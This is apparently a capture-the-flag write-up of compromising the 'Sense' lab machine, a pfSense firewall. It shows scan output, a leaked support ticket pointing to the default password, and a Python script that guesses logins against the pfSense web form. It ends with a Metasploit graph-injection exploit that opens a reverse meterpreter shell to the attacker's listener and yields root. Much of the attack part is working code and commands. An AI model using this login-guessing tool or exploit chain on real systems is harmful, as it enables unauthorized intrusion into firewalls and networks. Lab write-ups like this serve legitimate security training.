As always, we start with discovery.
First of all, Sense is a firewall (pfSense), so we can assume that is where the action will be.
Nmap tells us that ports 80 and 443 are open, and that 80 only redirects to HTTPS:
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-27 11:04 CET
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 15.94% done; ETC: 11:07 (0:02:17 remaining)
Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 68.66% done; ETC: 11:06 (0:00:41 remaining)
Nmap scan report for 10.10.10.60
Host is up (0.017s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 223.48 seconds
Sparta reports the same two ports, but as usual it gives us more information, because it also runs Nikto against the web service:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.60
+ Target Hostname:    10.10.10.60
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
                   Ciphers:  AES256-SHA
                   Issuer:   /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time:         2019-03-27 11:06:06 (GMT1)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /index.html, /index.php
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ OSVDB-112004: /: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /index.php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /help.php: A help file was found.
+ 7500 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2019-03-27 11:14:51 (GMT1) (525 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Particularly interesting are the Shellshock hit, the two index files and the other PHP locations. Nikto's Shellshock check is a heuristic, so treat that line as something to confirm rather than as a proven finding. We will run dirbuster with the php and txt extensions to see what else we can discover. Remember to turn off recursion, otherwise it will take forever.
Dirbuster finds two files:
- changelog.txt
- system_users.txt
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Admittedly there is some guessing involved: the real username is "rohit" in lowercase, and "company defaults" points at the pfSense factory default password, "pfsense". rohit:pfsense gets us into the web interface.
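The guessing step above can be made systematic. The following script is an added example, not part of the original writeup: it reads the ticket, expands it into the credential pairs worth trying (username casing variants, the literal hint, then the vendor default), and optionally posts each pair to the pfSense login form. The form details are assumptions not stated on the page: that pfSense 2.1.x posts usernamefld, passwordfld and login to /index.php, protects the form with a hidden __csrf_magic field, and answers a successful login with a 302 redirect. Verify them against the live login page before relying on the network part.

```python
"""Credential-guessing helper for the support-ticket hint (added example).

Assumed, not taken from the page: pfSense 2.1.x login form fields
(usernamefld, passwordfld, login), hidden anti-CSRF field __csrf_magic,
and a 302 redirect on successful login.
"""
import itertools
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Known pfSense factory default password (the admin account ships as
# admin:pfsense); "company defaults" in the ticket is what points here.
VENDOR_DEFAULTS = ["pfsense"]

# Constructed copy of the ticket text found in system_users.txt.
TICKET = (
    "####Support ticket###\n"
    "Please create the following user\n"
    "username: Rohit\n"
    "password: company defaults\n"
)

CSRF_RE = re.compile(r"""name=['"]__csrf_magic['"]\s+value=['"]([^'"]+)['"]""")


def parse_ticket(text):
    """Pull the 'username:' and 'password:' values out of the ticket."""
    user = re.search(r"username:\s*(\S+)", text, re.I)
    pw = re.search(r"password:\s*(.+)", text, re.I)
    if not user or not pw:
        raise ValueError("ticket has no username/password lines")
    return user.group(1), pw.group(1).strip()


def candidate_credentials(username, password_hint):
    """Expand a ticket into (user, password) pairs, most likely first.

    Usernames: literal casing, lowercase, uppercase (deduplicated).
    Passwords: the hint itself (it might really be the password), then the
    vendor defaults, since "company defaults" usually means out-of-the-box.
    """
    users = []
    for u in (username, username.lower(), username.upper()):
        if u not in users:
            users.append(u)
    passwords = [password_hint] + [p for p in VENDOR_DEFAULTS if p != password_hint]
    return list(itertools.product(users, passwords))


def extract_csrf_token(html):
    """Return the __csrf_magic value from a pfSense login page, or None."""
    m = CSRF_RE.search(html)
    return m.group(1) if m else None


def try_login(base_url, username, password):
    """POST one pair to the login form; True if the firewall redirects.

    The appliance uses a self-signed certificate (see the Nikto output),
    so verification is disabled for this lab host only.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        # Returning None makes urllib surface the 302 as an HTTPError
        # instead of following it, so we can inspect the status code.
        def redirect_request(self, *args, **kwargs):
            return None

    opener = urllib.request.build_opener(
        urllib.request.HTTPSHandler(context=ctx),
        urllib.request.HTTPCookieProcessor(),
        NoRedirect(),
    )
    page = opener.open(base_url + "/index.php").read().decode(errors="replace")
    fields = {"usernamefld": username, "passwordfld": password, "login": "Login"}
    token = extract_csrf_token(page)
    if token:
        fields["__csrf_magic"] = token
    body = urllib.parse.urlencode(fields).encode()
    try:
        resp = opener.open(base_url + "/index.php", data=body)
        return resp.getcode() == 302
    except urllib.error.HTTPError as err:
        return err.code == 302


if __name__ == "__main__":
    for user, pw in candidate_credentials(*parse_ticket(TICKET)):
        if try_login("https://10.10.10.60", user, pw):
            print(f"valid: {user}:{pw}")
            break
```

Run it as a script to walk the candidate list against the lab host; the parsing and expansion functions are usable offline if you only want to see which pairs it would try.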
Metasploit
From here on it is very simple: the module logs in with the credentials above, detects the pfSense version and uploads its payload.
msf5 exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_exec
msf5 exploit(unix/http/pfsense_graph_injection_exec) > show options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    10.10.10.60      yes       The target address range or CIDR identifier
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  rohit            yes       User to login with
   VHOST                      no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.91      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.91:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (38247 bytes) to 10.10.10.60
[*] Meterpreter session 3 opened (10.10.14.91:4444 -> 10.10.10.60:39599) at 2019-03-27 12:46:20 +0100
[!] Tried to delete HgyHu, unknown result

meterpreter > lpwd
/root
meterpreter > ps

Process List
============

 PID  Name  User  Path
 ---  ----  ----  ----
 0

meterpreter > getuid
Server username: root (0)
meterpreter >
And you are already root, so you can cat both flag files directly.